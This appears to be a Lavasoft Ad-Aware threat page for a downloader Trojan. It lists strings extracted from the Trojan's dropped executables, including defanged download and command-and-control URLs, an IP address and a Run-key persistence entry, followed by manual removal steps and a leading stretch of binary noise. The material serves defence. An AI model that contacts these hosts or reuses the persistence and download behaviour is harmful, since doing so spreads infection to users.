.....c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&
..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2.
.(....&..Z*....0..........(......c.d(....&..(......*..2..( ...&..Z*...
.0..........(......c.d(!...&..(......*..2..("...&..Z*....0..........(.
.....c.d(#...&..(......*..2..($...&..Z*....0..........(......c.d(%
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1332:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
tc.dll
t_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp
untup.php?sid=554655542
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
8!8-8B8I8}8
.reloc
System.dll
callback%d
@.reloc
BB%X3
.Kp9s
}/\a%u;
%2S$ 
z|.uO
.PX;:
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss30.tmp
nss30.tmp
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
//livestatscounter.com/Generic/vos.php?ch=
3a604241f2bb41d3ee1064890c23e1.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
1938953175.us-east-1.elb.amazonaws.com
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542
hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp
dlgen.php?r=vu_vo2_
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

nst16.tmp_264:

.text
`.rdata
@.data
.rsrc
@.reloc
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
KERNEL32.dll
USER32.dll
GetCPInfo
GetProcessHeap
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst16.tmp
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="hXXp://VVV.w3.org/2001/XMLSchema-instance"><assemblyIdentity version="1.0.0.0" name="hello.world"></assemblyIdentity><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><security><requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>
7*8084888<8
0%1u1
0 0$0(0,00040`1|1
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
AGEwfTkv.com
52.1.45.42:80

ppt.exe_1788:

.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
EnumWindows
USER32.dll
RegCloseKey
RegCreateKeyW
RegOpenKeyW
RegDeleteKeyW
RegDeleteKeyA
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
GetCPInfo
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\9158
%s\Microsoft\Internet Explorer\Quick Launch\9158
%s\9158
%s\%s
%s\*.*
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B5C48CDD-6C11-453D-91B4-59CFCE233D27}
%Program Files%\baidu\ppt.exe
<requestedExecutionLevel level="requireAdministrator"/>
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\QQ
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\2345
%s\Microsoft\Internet Explorer\Quick Launch\
$.xlkkvd
%s\My Box.lnk
%s\QQ
%s\2345
k%s\9158
$.qmgc
%s\My Box
%s\PPT
%s\Rising Antivirus
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
bf.desktop.bootpage.BootPage2
%s\ElTaces.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\wenguanjia
%s\unins000.exe
%s\wenguanjia
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1A3BD145-3384-4F81-9F6C-10F045887FD3}
CLSID\{1A3BD145-3384-4F81-9F6C-10F045887FD3}
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{CF3CDEFB-31BE-43AE-B064-B9C62C883259}
CLSID\{CF3CDEFB-31BE-43AE-B064-B9C62C883259}
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{33A895C1-4269-466F-9B01-0C8AEFB64AC3}
CLSID\{33A895C1-4269-466F-9B01-0C8AEFB64AC3}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RZC
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQPCMgr
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BaiduPinyin
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345chrome
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PPStream
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IQIYI Video
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GeePlayer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\LiveRoom
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\bfAppEngine
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
qqbrowser.exe
http\shell\open\command
%s\Internet Explorer\iexplore.exe
VVV.taobao.com
%s\Tencent\QQBrowser\qqbrowser.exe
kernel32.dll

Bind.exe_776:

.text
`.rdata
@.data
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
GetCPInfo
GET%sHTTP/1.1
Range: bytes=%d-
%Program Files%\baidu\Bind.exe

nst2B.tmp_2416:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\System.dll
\nsExec.dll
\inetc.dll
$$\wininit.ini
%Program Files%
q.ot[
g.ZO||k[
^2S%S
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst2B.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nst2B.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw2D.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst2B.tmp
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nsh1D.tmp:260
    nsh1D.tmp:1264
    Bind.exe:776
    amisid.exe:828
    ppt.exe:1788
    %original file name%.exe:1332
    nsr1A.tmp:2012
    nst16.tmp:264
    nsw7.tmp:1224
    nsn24.tmp:1984
    setup3.exe:408
    nsoB.tmp:284
    setup3.tmp:1040

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188757 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pptxd[1].exe (47264 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe (6872 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (36464 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (150707 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (6872 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe (36464 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (47264 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe (9352 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (9352 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vos[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (10646 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\wpesEcv[1].exe (150707 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh1D.tmp (8472 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe (8472 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\avg18.exe (40388 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe (152993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\setup3.exe (2420 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (3638 bytes)
    %Program Files%\baidu\is-GBLUE.tmp (36 bytes)
    %Program Files%\baidu\unins000.dat (934 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Program Files%\baidu\is-KO5N5.tmp (34453 bytes)
    %Program Files%\baidu\is-I042G.tmp (601 bytes)
    %Program Files%\baidu\baidu.ini (65 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "apphide" = "%Program Files%\baidu\ppt.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now